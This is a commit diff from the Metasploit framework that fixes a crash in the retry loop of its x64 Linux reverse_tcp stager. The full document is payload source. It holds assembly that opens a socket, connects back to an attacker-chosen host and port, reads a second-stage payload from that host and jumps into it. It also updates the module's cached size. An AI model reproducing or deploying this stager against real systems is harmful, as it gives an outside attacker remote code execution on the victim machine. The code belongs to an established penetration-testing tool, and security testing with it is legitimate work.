Land rapid7#9977, fix crash during x64 linux reverse_tcp stager retry

timwr · timwr · commit 5f01b6abc97f · 2018-05-05T17:13:00.000+08:00
diff --git a/lib/msf/core/payload/linux/x64/reverse_tcp.rb b/lib/msf/core/payload/linux/x64/reverse_tcp.rb
@@ -107,8 +107,6 @@ def asm_reverse_tcp(opts={})
 
         push   #{retry_count}        ; retry counter
         pop    r9
-
-      create_socket:
         push   rsi
         push   rax
         push   0x29
@@ -122,8 +120,9 @@ def asm_reverse_tcp(opts={})
         test   rax, rax
         js failed
 
-      connect:
         xchg   rdi, rax
+
+      connect:
         mov    rcx, 0x#{encoded_host}#{encoded_port}
         push   rcx
         mov    rsi, rsp
@@ -132,39 +131,42 @@ def asm_reverse_tcp(opts={})
         push   0x2a
         pop    rax
         syscall ; connect(3, {sa_family=AF_INET, LPORT, LHOST, 16)
+        pop    rcx
         test   rax, rax
         jns    recv
 
       handle_failure:
         dec    r9
         jz     failed
+        push   rdi
         push   0x23
         pop    rax
         push   0x#{sleep_nanoseconds.to_s(16)}
         push   0x#{sleep_seconds.to_s(16)}
         mov    rdi, rsp
         xor    rsi, rsi
         syscall                      ; sys_nanosleep
-        test   rax, rax
-        jns    create_socket
-        jmp    failed
-
-      recv:
         pop    rcx
-        pop    rsi
-        pop    rdx
-        syscall	; read(3, "", 4096)
+        pop    rcx
+        pop    rdi
         test   rax, rax
-        js     failed
-
-        jmp    rsi ; to stage
+        jns    connect
 
       failed:
         push   0x3c
         pop    rax
         push   0x1
         pop    rdi
         syscall ; exit(1)
+
+      recv:
+        pop    rsi
+        pop    rdx
+        syscall ; read(3, "", 4096)
+        test   rax, rax
+        js     failed
+
+        jmp    rsi ; to stage
     ^
 
     asm
diff --git a/modules/payloads/stagers/linux/x64/reverse_tcp.rb b/modules/payloads/stagers/linux/x64/reverse_tcp.rb
@@ -8,7 +8,7 @@
 
 module MetasploitModule
 
-  CachedSize = 127
+  CachedSize = 129
 
   include Msf::Payload::Stager
   include Msf::Payload::Linux::ReverseTcp_x64
